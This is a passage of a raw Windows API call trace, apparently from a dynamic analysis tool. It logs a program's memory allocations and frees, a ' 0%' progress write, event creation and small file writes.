(_Block=0xb5fbf0) [0071.739] free (_Block=0xb5d808) [0071.740] free (_Block=0x7801c0) [0071.740] free (_Block=0xb5d7f8) [0071.740] free (_Block=0xb5f410) [0071.740] free (_Block=0xb5fc20) [0071.740] malloc (_Size=0x8) returned 0xb5fc20 [0071.740] malloc (_Size=0x8) returned 0xb5fbf0 [0071.740] malloc (_Size=0x22) returned 0x787b30 [0071.740] free (_Block=0xb5fc20) [0071.740] malloc (_Size=0x22) returned 0x787a40 [0071.740] free (_Block=0xb5fbf0) [0071.740] malloc (_Size=0x40) returned 0x7833d8 [0071.740] malloc (_Size=0x22) returned 0x787d10 [0071.740] malloc (_Size=0x4) returned 0xb5fbf0 [0071.740] free (_Block=0x0) [0071.740] free (_Block=0x787a40) [0071.740] malloc (_Size=0x8) returned 0xb5fc20 [0071.740] malloc (_Size=0x24) returned 0x787a40 [0071.740] free (_Block=0x787b30) [0071.740] malloc (_Size=0x24) returned 0x787b30 [0071.740] free (_Block=0xb5fc20) [0071.740] malloc (_Size=0x40) returned 0x7835d0 [0071.740] malloc (_Size=0x24) returned 0x787d40 [0071.740] malloc (_Size=0x8) returned 0xb5fc20 [0071.740] free (_Block=0xb5fbf0) [0071.740] free (_Block=0x787b30) [0071.740] malloc (_Size=0x8) returned 0xb5fbf0 [0071.741] malloc (_Size=0x18) returned 0x7801c0 [0071.741] free (_Block=0xb5fbf0) [0071.741] malloc (_Size=0x40) returned 0x783618 [0071.741] malloc (_Size=0x18) returned 0x7800c0 [0071.741] malloc (_Size=0xc) returned 0xb5f410 [0071.741] free (_Block=0xb5fc20) [0071.741] free (_Block=0x7801c0) [0071.741] malloc (_Size=0x8) returned 0xb5fc20 [0071.741] malloc (_Size=0x12) returned 0x7801c0 [0071.741] free (_Block=0xb5fc20) [0071.741] malloc (_Size=0x40) returned 0x783660 [0071.741] malloc (_Size=0x12) returned 0x780300 [0071.741] malloc (_Size=0x10) returned 0xb5f698 [0071.741] free (_Block=0xb5f410) [0071.741] free (_Block=0x7801c0) [0071.741] malloc (_Size=0x8) returned 0xb5fc20 [0071.741] malloc (_Size=0x8) returned 0xb5fbf0 [0071.741] malloc (_Size=0x18) returned 0x7801c0 [0071.741] free (_Block=0xb5fbf0) [0071.741] malloc (_Size=0x18) returned 0x780320 [0071.741] free (_Block=0x7801c0) [0071.741] free (_Block=0x780320) [0071.742] malloc (_Size=0x18) returned 0x780320 [0071.742] free (_Block=0xb5fc20) [0071.742] malloc (_Size=0x40) returned 0x7836a8 [0071.742] malloc (_Size=0x18) returned 0x7801c0 [0071.742] malloc (_Size=0x18) returned 0x780340 [0071.742] free (_Block=0xb5f698) [0071.742] free (_Block=0x780320) [0071.742] malloc (_Size=0x8) returned 0xb5fc20 [0071.742] malloc (_Size=0x2a) returned 0x781df0 [0071.742] free (_Block=0x787a40) [0071.742] malloc (_Size=0x2a) returned 0x781e28 [0071.742] free (_Block=0xb5fc20) [0071.742] malloc (_Size=0x40) returned 0x7836f0 [0071.742] malloc (_Size=0x2a) returned 0x781e60 [0071.742] free (_Block=0x781e28) [0071.742] malloc (_Size=0x8) returned 0xb5fc20 [0071.742] malloc (_Size=0x2c) returned 0x781e28 [0071.742] free (_Block=0x781df0) [0071.742] malloc (_Size=0x2c) returned 0x781df0 [0071.742] free (_Block=0xb5fc20) [0071.742] malloc (_Size=0x40) returned 0x783738 [0071.742] malloc (_Size=0x2c) returned 0x781e98 [0071.742] malloc (_Size=0x20) returned 0x784450 [0071.742] free (_Block=0x780340) [0071.742] free (_Block=0x781df0) [0071.742] malloc (_Size=0x8) returned 0xb5fc20 [0071.743] malloc (_Size=0x2a) returned 0x781df0 [0071.743] free (_Block=0xb5fc20) [0071.743] malloc (_Size=0x40) returned 0x783780 [0071.743] malloc (_Size=0x2a) returned 0x781ed0 [0071.743] free (_Block=0x781df0) [0071.743] malloc (_Size=0x8) returned 0xb5fc20 [0071.743] malloc (_Size=0x14) returned 0x780340 [0071.743] free (_Block=0xb5fc20) [0071.743] malloc (_Size=0x40) returned 0x7837c8 [0071.743] malloc (_Size=0x14) returned 0x780320 [0071.743] malloc (_Size=0x2c) returned 0x781df0 [0071.743] free (_Block=0x784450) [0071.743] free (_Block=0x780340) [0071.743] malloc (_Size=0x8) returned 0xb5fc20 [0071.743] malloc (_Size=0x16) returned 0x780340 [0071.743] free (_Block=0xb5fc20) [0071.743] malloc (_Size=0x40) returned 0x783810 [0071.743] malloc (_Size=0x16) returned 0x780360 [0071.743] free (_Block=0x780340) [0071.743] malloc (_Size=0x8) returned 0xb5fc20 [0071.743] malloc (_Size=0x1e) returned 0x784450 [0071.743] free (_Block=0xb5fc20) [0071.743] malloc (_Size=0x40) returned 0x783858 [0071.743] malloc (_Size=0x1e) returned 0x784478 [0071.743] free (_Block=0x784450) [0071.743] malloc (_Size=0x8) returned 0xb5fc20 [0071.743] malloc (_Size=0x1c) returned 0x784450 [0071.743] free (_Block=0xb5fc20) [0071.743] malloc (_Size=0x40) returned 0x7838a0 [0071.743] malloc (_Size=0x1c) returned 0x7844a0 [0071.744] malloc (_Size=0x38) returned 0x7817e8 [0071.744] free (_Block=0x781df0) [0071.744] free (_Block=0x784450) [0071.744] malloc (_Size=0x8) returned 0xb5fc20 [0071.744] malloc (_Size=0x26) returned 0x787a40 [0071.744] free (_Block=0xb5fc20) [0071.744] malloc (_Size=0x40) returned 0x7838e8 [0071.744] malloc (_Size=0x26) returned 0x787b30 [0071.744] free (_Block=0x787a40) [0071.744] malloc (_Size=0x8) returned 0xb5fc20 [0071.744] malloc (_Size=0x22) returned 0x787a40 [0071.744] free (_Block=0xb5fc20) [0071.744] malloc (_Size=0x40) returned 0x783930 [0071.744] malloc (_Size=0x22) returned 0x787d70 [0071.744] free (_Block=0x787a40) [0071.744] malloc (_Size=0x8) returned 0xb5fc20 [0071.744] malloc (_Size=0x3e) returned 0x783978 [0071.744] free (_Block=0x781e28) [0071.744] malloc (_Size=0x3e) returned 0x7839c0 [0071.744] free (_Block=0xb5fc20) [0071.744] malloc (_Size=0x40) returned 0x783a08 [0071.744] malloc (_Size=0x3e) returned 0x783a50 [0071.744] malloc (_Size=0x48) returned 0x7822c8 [0071.744] free (_Block=0x7817e8) [0071.744] free (_Block=0x7839c0) [0071.744] malloc (_Size=0x8) returned 0xb5fc20 [0071.744] malloc (_Size=0x38) returned 0x7817e8 [0071.744] free (_Block=0xb5fc20) [0071.744] malloc (_Size=0x40) returned 0x7839c0 [0071.745] malloc (_Size=0x38) returned 0x785008 [0071.745] free (_Block=0x7817e8) [0071.745] malloc (_Size=0x8) returned 0xb5fc20 [0071.745] malloc (_Size=0x3e) returned 0x783a98 [0071.745] free (_Block=0xb5fc20) [0071.745] malloc (_Size=0x40) returned 0x783ae0 [0071.745] malloc (_Size=0x3e) returned 0x783b28 [0071.745] free (_Block=0x783a98) [0071.745] malloc (_Size=0x8) returned 0xb5fc20 [0071.745] malloc (_Size=0x40) returned 0x783a98 [0071.745] free (_Block=0x783978) [0071.745] malloc (_Size=0x40) returned 0x783978 [0071.745] free (_Block=0xb5fc20) [0071.745] malloc (_Size=0x40) returned 0x783b70 [0071.745] malloc (_Size=0x40) returned 0x783bb8 [0071.745] free (_Block=0x783978) [0071.745] malloc (_Size=0x8) returned 0xb5fc20 [0071.745] malloc (_Size=0x14) returned 0x780340 [0071.745] free (_Block=0xb5fc20) [0071.745] malloc (_Size=0x40) returned 0x783978 [0071.745] malloc (_Size=0x14) returned 0x780380 [0071.745] malloc (_Size=0x5c) returned 0x785138 [0071.745] free (_Block=0x7822c8) [0071.745] free (_Block=0x780340) [0071.745] malloc (_Size=0x8) returned 0xb5fc20 [0071.745] malloc (_Size=0x40) returned 0x783c00 [0071.745] free (_Block=0xb5fc20) [0071.745] malloc (_Size=0x40) returned 0x783c48 [0071.745] malloc (_Size=0x40) returned 0x783c90 [0071.745] free (_Block=0x783c00) [0071.745] malloc (_Size=0x8) returned 0xb5fc20 [0071.745] malloc (_Size=0x2e) returned 0x781e28 [0071.746] free (_Block=0xb5fc20) [0071.746] malloc (_Size=0x40) returned 0x783c00 [0071.746] malloc (_Size=0x2e) returned 0x781df0 [0071.746] free (_Block=0x781e28) [0071.746] malloc (_Size=0x8) returned 0xb5fc20 [0071.746] malloc (_Size=0x30) returned 0x781e28 [0071.746] free (_Block=0xb5fc20) [0071.746] malloc (_Size=0x40) returned 0x783cd8 [0071.746] malloc (_Size=0x30) returned 0x781f08 [0071.746] free (_Block=0x781e28) [0071.746] malloc (_Size=0x8) returned 0xb5fc20 [0071.746] malloc (_Size=0x56) returned 0x7822c8 [0071.746] free (_Block=0x783a98) [0071.746] malloc (_Size=0x56) returned 0x7851a0 [0071.746] free (_Block=0xb5fc20) [0071.746] malloc (_Size=0x40) returned 0x783a98 [0071.746] malloc (_Size=0x56) returned 0x785200 [0071.746] free (_Block=0x7851a0) [0071.746] malloc (_Size=0x8) returned 0xb5fc20 [0071.746] malloc (_Size=0x4c) returned 0x785568 [0071.746] free (_Block=0xb5fc20) [0071.746] malloc (_Size=0x40) returned 0x783d20 [0071.746] malloc (_Size=0x4c) returned 0x7855c0 [0071.746] malloc (_Size=0x74) returned 0x785260 [0071.746] free (_Block=0x785138) [0071.746] free (_Block=0x785568) [0071.746] malloc (_Size=0x8) returned 0xb5fc20 [0071.746] malloc (_Size=0x44) returned 0x785048 [0071.746] free (_Block=0xb5fc20) [0071.746] malloc (_Size=0x40) returned 0x783d68 [0071.746] malloc (_Size=0x44) returned 0x785138 [0071.747] free (_Block=0x785048) [0071.747] malloc (_Size=0x8) returned 0xb5fc20 [0071.747] malloc (_Size=0x3a) returned 0x783db0 [0071.747] free (_Block=0xb5fc20) [0071.747] malloc (_Size=0x40) returned 0x783df8 [0071.747] malloc (_Size=0x3a) returned 0x783e40 [0071.747] free (_Block=0x783db0) [0071.747] malloc (_Size=0x8) returned 0xb5fc20 [0071.747] malloc (_Size=0x34) returned 0x7817e8 [0071.747] free (_Block=0xb5fc20) [0071.747] malloc (_Size=0x40) returned 0x783db0 [0071.747] malloc (_Size=0x34) returned 0x785048 [0071.747] free (_Block=0x7817e8) [0071.747] malloc (_Size=0x8) returned 0xb5fc20 [0071.747] malloc (_Size=0x24) returned 0x787a40 [0071.747] free (_Block=0xb5fc20) [0071.747] malloc (_Size=0x40) returned 0x783e88 [0071.747] malloc (_Size=0x24) returned 0x787da0 [0071.747] free (_Block=0x787a40) [0071.747] malloc (_Size=0x8) returned 0xb5fc20 [0071.747] malloc (_Size=0x54) returned 0x785188 [0071.747] free (_Block=0xb5fc20) [0071.747] malloc (_Size=0x40) returned 0x783ed0 [0071.747] malloc (_Size=0x54) returned 0x7852e0 [0071.747] free (_Block=0x785188) [0071.748] malloc (_Size=0x8) returned 0xb5fc20 [0071.748] malloc (_Size=0x44) returned 0x785188 [0071.748] free (_Block=0xb5fc20) [0071.748] malloc (_Size=0x40) returned 0x783f18 [0071.748] malloc (_Size=0x44) returned 0x785340 [0071.748] malloc (_Size=0x94) returned 0x785390 [0071.748] free (_Block=0x785260) [0071.748] free (_Block=0x785188) [0071.748] malloc (_Size=0x8) returned 0xb5fc20 [0071.748] malloc (_Size=0x48) returned 0x785188 [0071.748] free (_Block=0xb5fc20) [0071.748] malloc (_Size=0x40) returned 0x783f60 [0071.748] malloc (_Size=0x48) returned 0x785260 [0071.748] free (_Block=0x785188) [0071.748] malloc (_Size=0x8) returned 0xb5fc20 [0071.748] malloc (_Size=0x3c) returned 0x783fa8 [0071.748] free (_Block=0xb5fc20) [0071.748] malloc (_Size=0x40) returned 0x783ff0 [0071.748] malloc (_Size=0x3c) returned 0x784038 [0071.748] free (_Block=0x783fa8) [0071.748] malloc (_Size=0x8) returned 0xb5fc20 [0071.748] malloc (_Size=0x22) returned 0x787a40 [0071.748] free (_Block=0xb5fc20) [0071.748] malloc (_Size=0x40) returned 0x783fa8 [0071.748] malloc (_Size=0x22) returned 0x787dd0 [0071.748] free (_Block=0x787a40) [0071.749] malloc (_Size=0x8) returned 0xb5fc20 [0071.749] malloc (_Size=0x2e) returned 0x781e28 [0071.749] free (_Block=0xb5fc20) [0071.749] malloc (_Size=0x40) returned 0x784080 [0071.749] malloc (_Size=0x2e) returned 0x781f40 [0071.749] free (_Block=0x781e28) [0071.749] malloc (_Size=0x8) returned 0xb5fc20 [0071.749] malloc (_Size=0x1c) returned 0x784450 [0071.749] free (_Block=0xb5fc20) [0071.749] malloc (_Size=0x40) returned 0x7840c8 [0071.749] malloc (_Size=0x1c) returned 0x7844c8 [0071.749] free (_Block=0x784450) [0071.749] malloc (_Size=0x8) returned 0xb5fc20 [0071.749] malloc (_Size=0x32) returned 0x7817e8 [0071.749] free (_Block=0xb5fc20) [0071.749] malloc (_Size=0x40) returned 0x784110 [0071.749] malloc (_Size=0x32) returned 0x785188 [0071.749] free (_Block=0x7817e8) [0071.749] malloc (_Size=0x8) returned 0xb5fc20 [0071.749] malloc (_Size=0x8) returned 0xb5fbf0 [0071.749] malloc (_Size=0x22) returned 0x787a40 [0071.749] free (_Block=0xb5fbf0) [0071.749] malloc (_Size=0x22) returned 0x787e00 [0071.750] free (_Block=0x787a40) [0071.750] free (_Block=0x787e00) [0071.750] malloc (_Size=0x22) returned 0x787e00 [0071.750] free (_Block=0xb5fc20) [0071.750] malloc (_Size=0x40) returned 0x784158 [0071.750] malloc (_Size=0x22) returned 0x787a40 [0071.750] free (_Block=0x787e00) [0071.750] malloc (_Size=0x8) returned 0xb5fc20 [0071.750] malloc (_Size=0x28) returned 0x787e00 [0071.750] free (_Block=0xb5fc20) [0071.750] malloc (_Size=0x40) returned 0x7841a0 [0071.750] malloc (_Size=0x28) returned 0x787e30 [0071.750] malloc (_Size=0xbc) returned 0x785430 [0071.751] free (_Block=0x785390) [0071.751] free (_Block=0x787e00) [0071.751] malloc (_Size=0x8) returned 0xb5fc20 [0071.751] malloc (_Size=0x28) returned 0x787e00 [0071.751] free (_Block=0xb5fc20) [0071.751] malloc (_Size=0x40) returned 0x7841e8 [0071.751] malloc (_Size=0x28) returned 0x787e60 [0071.751] free (_Block=0x787e00) [0071.751] malloc (_Size=0x8) returned 0xb5fc20 [0071.751] malloc (_Size=0x24) returned 0x787e00 [0071.751] free (_Block=0xb5fc20) [0071.751] malloc (_Size=0x40) returned 0x784230 [0071.751] malloc (_Size=0x24) returned 0x787e90 [0071.751] free (_Block=0x787e00) [0071.751] malloc (_Size=0x8) returned 0xb5fc20 [0071.751] malloc (_Size=0x8) returned 0xb5fbf0 [0071.751] malloc (_Size=0x24) returned 0x787e00 [0071.751] malloc (_Size=0x4) returned 0xb5fbd0 [0071.751] malloc (_Size=0x8) returned 0xb5fb90 [0071.751] malloc (_Size=0x4) returned 0xb5fb50 [0071.751] free (_Block=0x0) [0071.751] malloc (_Size=0x5) returned 0xb5fbb0 [0071.751] free (_Block=0xb5fbd0) [0071.751] malloc (_Size=0x18) returned 0x780340 [0071.751] malloc (_Size=0x4) returned 0xb5fbd0 [0071.751] free (_Block=0x0) [0071.752] malloc (_Size=0x18) returned 0x780560 [0071.752] malloc (_Size=0x8) returned 0xb5fbe0 [0071.752] free (_Block=0xb5fbd0) [0071.752] malloc (_Size=0x20) returned 0x784450 [0071.752] malloc (_Size=0x4) returned 0xb5fbd0 [0071.752] free (_Block=0x0) [0071.752] malloc (_Size=0x8) returned 0xb5fc30 [0071.752] free (_Block=0x0) [0071.752] malloc (_Size=0x18) returned 0x780580 [0071.752] malloc (_Size=0x18) returned 0x7805a0 [0071.752] free (_Block=0xb5fb90) [0071.752] free (_Block=0xb5fbb0) [0071.752] free (_Block=0x780560) [0071.752] free (_Block=0x780340) [0071.752] free (_Block=0xb5fbe0) [0071.752] free (_Block=0x787e00) [0071.752] free (_Block=0xb5fb50) [0071.752] malloc (_Size=0x4) returned 0xb5fb50 [0071.752] malloc (_Size=0x8) returned 0xb5fbe0 [0071.752] malloc (_Size=0x5) returned 0xb5fbb0 [0071.752] free (_Block=0xb5fb50) [0071.752] malloc (_Size=0x18) returned 0x780340 [0071.752] malloc (_Size=0x4) returned 0xb5fb50 [0071.752] free (_Block=0x0) [0071.752] strlen (_Str="BT2") returned 0x3 [0071.752] malloc (_Size=0x18) returned 0x780560 [0071.753] malloc (_Size=0x8) returned 0xb5fb90 [0071.753] free (_Block=0xb5fb50) [0071.753] malloc (_Size=0x18) returned 0x7805c0 [0071.753] malloc (_Size=0xc) returned 0xb5f698 [0071.753] free (_Block=0xb5fb90) [0071.753] malloc (_Size=0x18) returned 0x7805e0 [0071.753] malloc (_Size=0x10) returned 0xb5f410 [0071.753] free (_Block=0xb5f698) [0071.753] malloc (_Size=0x18) returned 0x780600 [0071.753] malloc (_Size=0x18) returned 0x780620 [0071.753] free (_Block=0xb5f410) [0071.753] malloc (_Size=0x20) returned 0x7844f0 [0071.753] malloc (_Size=0x4) returned 0xb5fb90 [0071.753] free (_Block=0x0) [0071.753] malloc (_Size=0x14) returned 0x780640 [0071.753] free (_Block=0x0) [0071.754] free (_Block=0xb5fbe0) [0071.754] free (_Block=0xb5fbb0) [0071.754] free (_Block=0x780600) [0071.754] free (_Block=0x7805e0) [0071.754] free (_Block=0x7805c0) [0071.755] free (_Block=0x780560) [0071.755] free (_Block=0x780340) [0071.755] free (_Block=0x780620) [0071.755] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0xf0000 [0071.756] free (_Block=0x0) [0071.756] malloc (_Size=0xa0) returned 0x786550 [0071.756] malloc (_Size=0x34) returned 0x786610 [0071.756] malloc (_Size=0xa) returned 0xb5f410 [0071.756] malloc (_Size=0x8) returned 0xb5fc20 [0071.756] free (_Block=0x0) [0071.757] malloc (_Size=0x4) returned 0xb5fbb0 [0071.757] free (_Block=0x0) [0071.757] malloc (_Size=0x10) returned 0xb5f698 [0071.757] free (_Block=0x0) [0071.757] malloc (_Size=0x18) returned 0x780620 [0071.757] malloc (_Size=0x4) returned 0xb5fbe0 [0071.757] free (_Block=0x0) [0071.757] malloc (_Size=0x8) returned 0xb5fb50 [0071.757] free (_Block=0x0) [0071.757] free (_Block=0xb5fbb0) [0071.757] free (_Block=0xb5fc20) [0071.757] free (_Block=0x0) [0071.757] free (_Block=0xb5f410) [0071.757] free (_Block=0x786610) [0071.757] malloc (_Size=0x34) returned 0x786610 [0071.758] malloc (_Size=0xa) returned 0xb5f410 [0071.758] malloc (_Size=0x8) returned 0xb5fc20 [0071.758] free (_Block=0x0) [0071.758] malloc (_Size=0x4) returned 0xb5fbb0 [0071.758] free (_Block=0x0) [0071.758] malloc (_Size=0x10) returned 0xb5f668 [0071.758] free (_Block=0xb5fb50) [0071.758] free (_Block=0xb5fbb0) [0071.758] free (_Block=0xb5fc20) [0071.758] free (_Block=0x0) [0071.758] free (_Block=0xb5f410) [0071.758] free (_Block=0x786610) [0071.758] malloc (_Size=0x34) returned 0x786610 [0071.758] malloc (_Size=0xa) returned 0xb5f410 [0071.758] malloc (_Size=0x8) returned 0xb5fc20 [0071.758] free (_Block=0x0) [0071.758] malloc (_Size=0x4) returned 0xb5fbb0 [0071.758] free (_Block=0x0) [0071.759] malloc (_Size=0x18) returned 0x780340 [0071.759] free (_Block=0xb5f668) [0071.759] free (_Block=0xb5fbb0) [0071.759] free (_Block=0xb5fc20) [0071.759] free (_Block=0x0) [0071.759] free (_Block=0xb5f410) [0071.759] free (_Block=0x786610) [0071.759] malloc (_Size=0x34) returned 0x786610 [0071.759] malloc (_Size=0xa) returned 0xb5f410 [0071.759] malloc (_Size=0x8) returned 0xb5fc20 [0071.759] free (_Block=0x0) [0071.759] malloc (_Size=0x4) returned 0xb5fbb0 [0071.759] free (_Block=0x0) [0071.759] malloc (_Size=0x20) returned 0x784518 [0071.760] free (_Block=0x780340) [0071.760] free (_Block=0xb5fbb0) [0071.760] free (_Block=0xb5fc20) [0071.760] free (_Block=0x0) [0071.760] free (_Block=0xb5f410) [0071.760] free (_Block=0x786610) [0071.760] malloc (_Size=0x34) returned 0x786610 [0071.760] malloc (_Size=0xa) returned 0xb5f410 [0071.760] malloc (_Size=0x8) returned 0xb5fc20 [0071.760] free (_Block=0x0) [0071.760] malloc (_Size=0x4) returned 0xb5fbb0 [0071.760] free (_Block=0x0) [0071.760] malloc (_Size=0x30) returned 0x781e28 [0071.760] free (_Block=0x784518) [0071.760] free (_Block=0xb5fbb0) [0071.760] free (_Block=0xb5fc20) [0071.760] free (_Block=0x0) [0071.760] free (_Block=0xb5f410) [0071.761] free (_Block=0x786610) [0071.761] malloc (_Size=0x34) returned 0x786610 [0071.761] malloc (_Size=0xa) returned 0xb5f410 [0071.761] malloc (_Size=0x8) returned 0xb5fc20 [0071.761] free (_Block=0x0) [0071.761] malloc (_Size=0x4) returned 0xb5fbb0 [0071.761] free (_Block=0x0) [0071.761] free (_Block=0xb5fbb0) [0071.761] free (_Block=0xb5fc20) [0071.761] free (_Block=0x0) [0071.761] free (_Block=0xb5f410) [0071.761] free (_Block=0x786610) [0071.761] malloc (_Size=0x34) returned 0x786610 [0071.761] malloc (_Size=0xa) returned 0xb5f410 [0071.761] malloc (_Size=0x8) returned 0xb5fc20 [0071.761] free (_Block=0x0) [0071.761] malloc (_Size=0x4) returned 0xb5fbb0 [0071.761] free (_Block=0x0) [0071.761] malloc (_Size=0x40) returned 0x784278 [0071.761] free (_Block=0x781e28) [0071.762] free (_Block=0xb5fbb0) [0071.762] free (_Block=0xb5fc20) [0071.762] free (_Block=0x0) [0071.762] free (_Block=0xb5f410) [0071.762] free (_Block=0x786610) [0071.762] malloc (_Size=0x34) returned 0x786610 [0071.762] malloc (_Size=0xa) returned 0xb5f410 [0071.762] malloc (_Size=0x8) returned 0xb5fc20 [0071.762] free (_Block=0x0) [0071.762] malloc (_Size=0x4) returned 0xb5fbb0 [0071.762] free (_Block=0x0) [0071.762] free (_Block=0xb5fbb0) [0071.762] free (_Block=0xb5fc20) [0071.762] free (_Block=0x0) [0071.762] free (_Block=0xb5f410) [0071.762] free (_Block=0x786610) [0071.762] malloc (_Size=0x34) returned 0x786610 [0071.762] malloc (_Size=0xa) returned 0xb5f410 [0071.762] malloc (_Size=0x8) returned 0xb5fc20 [0071.763] free (_Block=0x0) [0071.763] malloc (_Size=0x4) returned 0xb5fbb0 [0071.763] free (_Block=0x0) [0071.763] malloc (_Size=0x58) returned 0x785390 [0071.763] free (_Block=0x784278) [0071.763] free (_Block=0xb5fbb0) [0071.763] free (_Block=0xb5fc20) [0071.763] free (_Block=0x0) [0071.763] free (_Block=0xb5f410) [0071.763] free (_Block=0x786610) [0071.763] malloc (_Size=0x34) returned 0x786610 [0071.763] malloc (_Size=0xa) returned 0xb5f410 [0071.763] malloc (_Size=0x8) returned 0xb5fc20 [0071.763] free (_Block=0x0) [0071.763] malloc (_Size=0x4) returned 0xb5fbb0 [0071.763] free (_Block=0x0) [0071.763] free (_Block=0xb5fbb0) [0071.763] free (_Block=0xb5fc20) [0071.764] free (_Block=0x0) [0071.764] free (_Block=0xb5f410) [0071.764] free (_Block=0x786610) [0071.764] malloc (_Size=0x34) returned 0x786610 [0071.764] malloc (_Size=0xa) returned 0xb5f410 [0071.764] malloc (_Size=0x8) returned 0xb5fc20 [0071.764] free (_Block=0x0) [0071.764] malloc (_Size=0x4) returned 0xb5fbb0 [0071.764] free (_Block=0x0) [0071.764] free (_Block=0xb5fbb0) [0071.764] free (_Block=0xb5fc20) [0071.764] free (_Block=0x0) [0071.764] free (_Block=0xb5f410) [0071.764] free (_Block=0x786610) [0071.764] malloc (_Size=0x34) returned 0x786610 [0071.765] malloc (_Size=0xa) returned 0xb5f410 [0071.765] malloc (_Size=0x8) returned 0xb5fc20 [0071.765] free (_Block=0x0) [0071.765] malloc (_Size=0x4) returned 0xb5fbb0 [0071.765] free (_Block=0x0) [0071.765] malloc (_Size=0x70) returned 0x7875f8 [0071.765] free (_Block=0x785390) [0071.765] free (_Block=0xb5fbb0) [0071.765] strlen (_Str="0") returned 0x1 [0071.765] fputs (in: _Str=" 0%", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.766] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.766] malloc (_Size=0x38) returned 0x786610 [0071.767] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xc8 [0071.767] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xcc [0071.767] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xd0 [0071.767] malloc (_Size=0x38) returned 0x786650 [0071.767] malloc (_Size=0x4) returned 0xb5fc20 [0071.767] WriteFile (in: hFile=0xc4, lpBuffer=0x5ae9f8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x5ae98c, lpOverlapped=0x0 | out: lpBuffer=0x5ae9f8*, lpNumberOfBytesWritten=0x5ae98c*=0x8, lpOverlapped=0x0) returned 1 [0071.768] SetFilePointer (in: hFile=0xc4, lDistanceToMove=0, lpDistanceToMoveHigh=0x5ae9d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5ae9d0*=0) returned 0x8 [0071.768] WriteFile (in: hFile=0xc4, lpBuffer=0x5aea00*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x5ae994, lpOverlapped=0x0 | out: lpBuffer=0x5aea00*, lpNumberOfBytesWritten=0x5ae994*=0x18, lpOverlapped=0x0) returned 1 [0071.769] malloc (_Size=0x4) returned 0xb5fc20 [0071.769] free (_Block=0x0) [0071.769] malloc (_Size=0x8) returned 0xb5fb50 [0071.769] free (_Block=0xb5fc20) [0071.769] malloc (_Size=0xc) returned 0xb5f410 [0071.769] free (_Block=0xb5fb50) [0071.769] malloc (_Size=0x10) returned 0xb5f668 [0071.769] free (_Block=0xb5f410) [0071.769] malloc (_Size=0x8) returned 0xb5fb50 [0071.769] malloc (_Size=0x22) returned 0x787e00 [0071.769] free (_Block=0xb5fb50) [0071.769] malloc (_Size=0x1) returned 0xb5fb50 [0071.769] free (_Block=0x0) [0071.769] malloc (_Size=0x1) returned 0xb5fc20 [0071.769] free (_Block=0x0) [0071.769] malloc (_Size=0x1) returned 0xb5fad0 [0071.769] free (_Block=0x0) [0071.769] malloc (_Size=0x8) returned 0xb5fa90 [0071.769] free (_Block=0x0) [0071.769] malloc (_Size=0x1) returned 0xb5fab0 [0072.257] free (_Block=0x0) [0072.257] malloc (_Size=0x1) returned 0xb5fac0 [0072.257] free (_Block=0x0) [0072.257] malloc (_Size=0x4) returned 0xb5fb30 [0072.257] free (_Block=0x0) [0072.257] malloc (_Size=0x1) returned 0xb5fb40 [0072.257] free (_Block=0x0) [0072.257] malloc (_Size=0xc) returned 0xb5f410 [0072.257] malloc (_Size=0x22) returned 0x787ec0 [0072.257] malloc (_Size=0x4) returned 0xb5fc40 [0072.257] free (_Block=0x0) [0072.258] malloc (_Size=0x10) returned 0xb5f4e8 [0072.258] free (_Block=0x0) [0072.258] free (_Block=0x787e00) [0072.258] malloc (_Size=0x8) returned 0xb5fc70 [0072.258] malloc (_Size=0x14) returned 0x780340 [0072.258] free (_Block=0xb5fc70) [0072.258] malloc (_Size=0x2) returned 0xb5fc70 [0072.258] free (_Block=0xb5fb50) [0072.258] malloc (_Size=0x2) returned 0xb5fb50 [0072.258] free (_Block=0xb5fc20) [0072.258] malloc (_Size=0x2) returned 0xb5fc20 [0072.258] free (_Block=0xb5fad0) [0072.258] malloc (_Size=0x10) returned 0xb5f578 [0072.258] free (_Block=0xb5fa90) [0072.258] malloc (_Size=0x2) returned 0xb5fa90 [0072.258] free (_Block=0xb5fab0) [0072.259] malloc (_Size=0x2) returned 0xb5fab0 [0072.259] free (_Block=0xb5fac0) [0072.259] malloc (_Size=0x8) returned 0xb5fac0 [0072.259] free (_Block=0xb5fb30) [0072.259] malloc (_Size=0x2) returned 0xb5fb30 [0072.259] free (_Block=0xb5fb40) [0072.260] malloc (_Size=0xc) returned 0xb5f590 [0072.260] malloc (_Size=0x14) returned 0x780560 [0072.260] malloc (_Size=0x8) returned 0xb5fb40 [0072.260] free (_Block=0xb5fc40) [0072.260] malloc (_Size=0x20) returned 0x784518 [0072.260] free (_Block=0xb5f4e8) [0072.260] free (_Block=0x780340) [0072.260] malloc (_Size=0x8) returned 0xb5fc40 [0072.260] malloc (_Size=0x30) returned 0x781e28 [0072.260] free (_Block=0xb5fc40) [0072.260] malloc (_Size=0x3) returned 0xb5fc40 [0072.260] free (_Block=0xb5fc70) [0072.260] malloc (_Size=0x3) returned 0xb5fc70 [0072.260] free (_Block=0xb5fb50) [0072.260] malloc (_Size=0x3) returned 0xb5fb50 [0072.260] free (_Block=0xb5fc20) [0072.260] malloc (_Size=0x18) returned 0x780340 [0072.260] free (_Block=0xb5f578) [0072.260] malloc (_Size=0x3) returned 0xb5fc20 [0072.260] free (_Block=0xb5fa90) [0072.260] malloc (_Size=0x3) returned 0xb5fa90 [0072.260] free (_Block=0xb5fab0) [0072.260] malloc (_Size=0xc) returned 0xb5f578 [0072.261] free (_Block=0xb5fac0) [0072.261] malloc (_Size=0x3) returned 0xb5fac0 [0072.261] free (_Block=0xb5fb30) [0072.261] malloc (_Size=0xc) returned 0xb5f4e8 [0072.261] malloc (_Size=0x30) returned 0x781f78 [0072.261] malloc (_Size=0xc) returned 0xb5f5a8 [0072.261] free (_Block=0xb5fb40) [0072.261] malloc (_Size=0x30) returned 0x781fb0 [0072.261] free (_Block=0x784518) [0072.261] free (_Block=0x781e28) [0072.261] malloc (_Size=0x8) returned 0xb5fb40 [0072.261] malloc (_Size=0x24) returned 0x787e00 [0072.261] free 